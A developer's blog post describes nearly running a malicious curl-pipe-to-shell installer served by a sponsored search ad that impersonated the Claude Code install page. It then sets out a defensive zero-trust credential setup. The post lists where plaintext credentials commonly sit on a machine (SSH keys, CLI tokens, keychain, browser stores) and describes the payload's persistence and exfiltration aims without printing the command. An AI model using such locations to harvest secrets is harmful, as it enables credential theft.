I Googled 'Claude Code Install' and Nearly Lost Everything
How a single sponsored search result nearly handed my entire machine to an attacker — and the zero-trust local environment I built afterwards.
I consider myself security-aware. I run a locked-down local environment — credentials in 1Password, SSH keys never on disk, short-lived cloud sessions, the works. I know what curl | sh does. And I nearly handed my entire machine to an attacker because I clicked a sponsored Google result.
This is that story, and what I did afterwards.
The curl that almost took everything
I was setting up this blog. I needed Claude Code on a personal laptop and did what every developer does: I googled “Claude Code install.”
The first result was a sponsored ad. And there on (what I thought was) the Anthropic home page: the familiar one-liner. The curl | sh that every developer gets a dopamine hit from, because it means copy, paste, enter, done.
So I copied it. I pasted it. I hit enter.
The script ran. A macOS system password prompt appeared. Nothing visually unusual about it — a standard-looking sudo request. But something felt off. I cannot tell you exactly what. It was not a conscious analysis. It was a gut reaction, the kind you develop after years of working in terminals.
I had started typing my password. I stopped. I cancelled. I rebooted.
That gut reaction saved my machine.
What was behind it
The command I had run was not what it appeared. The URL was obfuscated using tr-based character substitution — the kind of trick designed to survive a casual glance but defeat basic content filtering. The curl flags included -k, which skips TLS certificate verification entirely. The output was piped straight to zsh.
When I later analysed the decoded URL, the 64-character hex string at the end was almost certainly a unique victim identifier. Someone was tracking who ran what.
The payload itself was serious. This was not a script-kiddie prank. The full attack would have installed a Nix-based hidden partition on the machine — the kind of persistence mechanism that could potentially survive a reformat. On top of that: full credential exfiltration, everything readable by the current user sent off to a remote server.
The password prompt was right at the beginning of the script. It needed admin access to install that partition. Because I cancelled before entering my password, the deepest parts of the attack never executed. But everything the script could do as my unprivileged user — reading files, sending data — it could have done in the seconds before I cancelled.
I expected better from you, Google
A paid sponsored result serving obfuscated malware impersonating a mainstream developer tool. I reported it to Google Safe Browsing — but this should never have got through ad review.
The investigation
My first instinct after rebooting was: do not trust this machine.
I did not open a terminal. I did not run anything locally. Instead, I went to Gemini’s web console — a completely separate environment, nothing running on my hardware — and pasted the script URL. I asked Gemini to inspect the contents. Not run it. Just read it and tell me what it does.
It decoded the obfuscation, identified the payload, and confirmed that every script hosted on that site was malware. It could also see that the destructive payload — the partition install, the deep persistence — required the admin password I had not provided.
Armed with Gemini’s report, I opened Claude Code and asked it to investigate further. It swept the machine systematically — every common attack vector: crontab, launch agents, launch daemons, shell profiles, temporary directories, running processes. I also ran a full malware scan. No trace of the malware beyond the command in my shell history, which I then deleted.
I asked Claude Code to write up a full incident report — timestamped, structured, with a complete credential audit. That report went straight into my git-backed “home” knowledgebase, because when something goes wrong, the first thing you want is a clear written record of exactly what happened and what you did about it.
What did this thing have access to?
My gut reaction was immediate and visceral: what could this thing have got hold of?
Luckily, I already work in a fairly sandboxed way. Everything lives in 1Password. Nothing in the macOS Keychain, nothing saved in the browser. AWS goes through Granted SSO with short-lived tokens. So the blast radius was already smaller than it could have been.
But it was not zero. A few things were still on disk:
SSH private key — sitting in ~/.ssh/id_rsa. An older key that coexisted alongside my 1Password-managed one.
GitHub CLI token — stored in ~/.config/gh/hosts.yml. Access to my personal repositories.
Pulumi Cloud token — plaintext in ~/.pulumi/credentials.json. Access to infrastructure-as-code organisation.
AWS credentials — fine. Temporary STS token via Granted SSO, already expired by the time I investigated.
Kubernetes config — home server client certificates in ~/.kube/config. Mitigated by the server not being internet-accessible.
macOS Keychain — worth noting for others: the login keychain unlocks automatically when you log in. A script running as your user can silently read items that do not have explicit password-protection ACLs set — many CLI-added items fall into this category. I do not use the Keychain for credentials, but if you do, be aware of this.
Browser-stored passwords — Chrome, Firefox, and Safari all store credentials in databases readable by the current user. Another reason to use a dedicated credential manager rather than browser-saved passwords. Again, not a risk for me — but worth calling out.
The picture was not catastrophic — most of my setup was already locked down. But those few stragglers on disk were enough to make me uncomfortable. It only takes one leaked SSH key or API token to cause real damage.
The response
I rotated everything immediately. Even though the investigation suggested nothing had been exfiltrated, I treated it as if it had.
- SSH key: removed from GitHub, deleted from disk, new key generated inside 1Password — never exported, never on the filesystem
- GitHub CLI token: rotated, moved to 1Password, now injected at runtime via
op run - Pulumi token: revoked, new token in 1Password, plaintext file deleted, now via
op run - AWS: no action needed — already temporary tokens via Granted SSO
- Shell history: malicious command removed
Then I audited the security logs. GitHub’s audit log showed no suspicious activity during the incident window — no new keys added, no unexpected pushes, no OAuth authorisations I did not recognise. Same story across other services. Clean.
It seems I was lucky. This time.
The postmortem: what if (when) it happens again?
Here is where my thinking shifted. The question was no longer “did this attack succeed?” It was: when the next one does, how do I make sure it does not matter?
Not because it definitely will — but because I need to assume it could. A moment of inattention. A prompt injection in an inbox scanner. A supply chain compromise in a dependency. The attack surface for developers is enormous and growing, especially as we grant AI agents more access to our systems.
So my assumption now is: assume compromise is possible, and make sure it does not matter. The goal is not to prevent every possible attack. The goal is to ensure that if something gets through, the blast radius is zero.
Zero trust starts on your own machine
The protocol I built afterwards has one rule: no credential should be usable if exfiltrated from disk.
Everything lives in 1Password
Every secret — SSH keys, API tokens, CLI credentials — is stored in 1Password and injected at runtime. Nothing sits on the filesystem.
SSH keys are generated inside 1Password and served by the 1Password SSH agent. The private key never touches disk. It never appears in a file. The agent signs requests in memory, gated by biometric authentication. If someone copies your entire home directory, they get nothing.
CLI tools — the first port of call is to check whether 1Password has a plugin for the tool. GitHub CLI and Pulumi both have native 1Password plugins that handle authentication seamlessly — no aliases needed, just configure the plugin and it works:
# These tools have 1Password plugins — zero config after setup
gh auth status # authenticated via 1Password plugin
pulumi up # token injected by 1Password plugin
For tools without a plugin, op run injects the token into the subprocess environment without ever writing it to disk:
# Tools without plugins — use op run via a shell alias
alias cloudflare='op run --env-file=~/.config/cloudflare/env -- cloudflare'
No friction in daily use. No credential on disk. Ever.
Short-lived sessions only
AWS access goes through Granted SSO. Every session is a temporary STS token with a tight expiry. Even if exfiltrated, it is useless within hours. I deliberately keep these sessions short.
For any tool that requires a persistent token: it goes in 1Password. There are no exceptions.
Periodic credential audits
I built a Claude Code skill called credential-audit that scans the machine for plaintext credentials — the usual suspects: ~/.aws/credentials, ~/.ssh/*.key, .env files, anything that looks like a token in a config file. I run it regularly. Think of it like running your test suite, but for your own security posture. I have an outstanding action to harden this up or use an off the shelf skill.
1Password’s Watchtower feature does something similar at a broader level — flagging compromised passwords, weak credentials, services without MFA. Turn it on.
MFA everywhere
Hardware keys or TOTP on every web service. Non-negotiable. This deserves its own post, and fortunately I’ve followed this practice for years. But for now: if a service supports it and you have not enabled it, do it today.
Living with it: permission hygiene for AI agents
This protocol means I get prompted by 1Password a lot. Every time an agent needs to push to GitHub, every time Pulumi runs, every time an SSH connection is made — 1Password asks for confirmation.
This is where the balance gets delicate.
If you get prompted too much, you will start blindly accepting. And blind acceptance is exactly as dangerous as having no protection at all. You need to find the sweet spot: enough prompts that you are making conscious decisions about access, few enough that you actually read them.
My approach: be somewhat lenient on permissions for common operations, but for every prompt, spend one second asking: what is this session doing, and does it need this?
Usually the answer is obvious. The agent is pushing a PR — of course it needs the SSH key. But occasionally something feels off. An agent asking for credentials it should not need. A session that has been running longer than expected. A prompt that does not match what you thought was happening.
This is where intuition matters. Anthropic’s own guidance on working with AI agents is good here: you cannot review every single command. That is not feasible. But you can develop a feel for when things are going as expected and when they are not. If something feels off, stop the session and investigate what is happening. It is always cheaper to interrupt and check than to let something run that should not be running.
Feature request: 1Password, please give us agent context
When multiple AI agents are running concurrently, the 1Password prompt just says “Terminal wants to use your SSH key.” I would love it to say: “The DynamoDB performance agent wants the Git SSH key to push a PR.” Linking the access request to the session context would make the approve/deny decision trivial. Would be a nice addition to the multi-agent workflow.
What I still want
An emergency kill switch. A single command — ideally runnable from a separate trusted device — that invalidates every active session across every service. If my machine is compromised right now, I want one button that revokes everything, immediately.
Some services support this individually. But a unified “revoke all sessions everywhere” capability, integrated with 1Password, would be genuinely useful. Today I would have to manually cycle through each service. Under pressure, in an incident, that is too slow.
The uncomfortable truth
I am someone who thinks about security daily. I work with AI agents, I understand the risks, I read about prompt injection and supply chain attacks. And I nearly lost my machine to a Google search.
The curl | sh pattern is a social engineering masterpiece. It is the exact shape of something developers trust: a clean one-liner, the promise of zero friction, the dopamine hit of a fast install. It is designed to bypass the part of your brain that asks questions.
I got lucky. A vague feeling. A few seconds of hesitation. That is not a security strategy.
What I have now — 1Password holding everything, nothing on disk, short-lived sessions, regular audits, conscious permission decisions — that is a security strategy. It assumes I will make mistakes. It assumes something will get through. And it ensures that when it does, there is nothing to take.
If you have read my first post, you will know that boundaries are the overarching theme of everything I write about here. The same principle applies to your local environment: if credentials are isolated, sessions are scoped, and access requires explicit approval, then a breach in one area cannot cascade into everything else. Zero trust is boundary discipline applied to your own machine.
Treat your laptop as a hostile environment, because one day it will be.
If you work with AI coding agents, I would strongly recommend auditing what credentials are sitting on your local disk right now. You might be surprised. The security find-generic-password command on macOS, a quick ls of your home directory config files, and a check of ~/.ssh/ will tell you most of what you need to know. Then move everything into a credential manager and never look back.